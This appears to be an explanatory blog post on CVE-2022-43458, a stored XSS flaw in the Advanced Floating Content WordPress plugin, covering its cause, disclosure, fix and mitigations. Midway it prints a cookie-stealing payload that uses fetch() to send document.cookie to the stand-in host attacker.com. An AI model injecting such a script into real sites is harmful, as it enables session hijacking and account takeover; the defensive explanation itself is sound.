If you use WordPress, you probably want your site to look unique, or maybe you want to show important messages to your users. One way to do that is with customization plugins, and thousands of people picked the Advanced Floating Content plugin by Code Tides. But for a while, this plugin left a door wide open for hackers because of a security problem called CVE-2022-43458.

Let’s break down what this vulnerability is, how it works, and how someone might exploit it—without complicated jargon.

What’s the Vulnerability? (TL;DR)

CVE-2022-43458 is a Stored Cross-Site Scripting (XSS) bug. It lets anyone with a "contributor" user role or higher on a WordPress site insert JavaScript code that runs in the browser of any person who visits a modified floating content block. This attack works on all versions of the plugin up to and including 1.2.1.

That means a low-level user—not just admins—could attack *everyone* who sees the floating content, including other admins, potentially taking over accounts or stealing cookies.

Why Is This an Issue?

The plugin allowed contributors to publish floating content with HTML, but it didn’t do a good job filtering out dangerous JavaScript. So, a malicious script could be saved right inside the settings and shown to visitors.

No sanitization or escaping for <script> tags

So, a contributor could submit this data, and the plugin would display it *as-is*.

Here’s a simple malicious payload

<script>alert('This site is hacked!');</script>

When another user visits the site, that script runs in their browser. It could just as easily steal cookies or perform more damaging actions.

Here’s what an attacker might save as the floating content

<div>
  <strong>Important!</strong>
  <script>
    // Steal an admin's cookies and send them to an attacker
    fetch('https://attacker.com/steal?cookie='+document.cookie);
  </script>
</div>

How Was This Found and Reported?

Original research and disclosure:  
- WPScan Report
-  Patchstack Article

Researchers routinely test plugins for these flaws, and this one was flagged due to a lack of output sanitization.

What did the plugin author do?

- Released version 1.2.2 with fixes to properly sanitize/escape user-supplied HTML and scripts

Remove or review existing floating content for any suspicious or unexpected scripts

- Review user roles and prune unused contributor/editor/admin accounts

Always validate and escape user input, especially HTML in plugin settings

- Limit contributor/editor access if you don’t need it

References

- WPScan Vulnerability Report: CVE-2022-43458
- NVD: CVE-2022-43458
- Patchstack Database Entry

Conclusion

CVE-2022-43458 is a clear example of why even trustworthy plugins can have serious bugs affecting your WordPress site. Always keep your plugins up to date, watch for known vulnerabilities, and consider who *really* needs contributor/editor access. A little vigilance goes a long way in keeping your website safe.

Timeline

Published on: 04/16/2023 09:15:00 UTC
Last modified on: 04/21/2023 04:16:00 UTC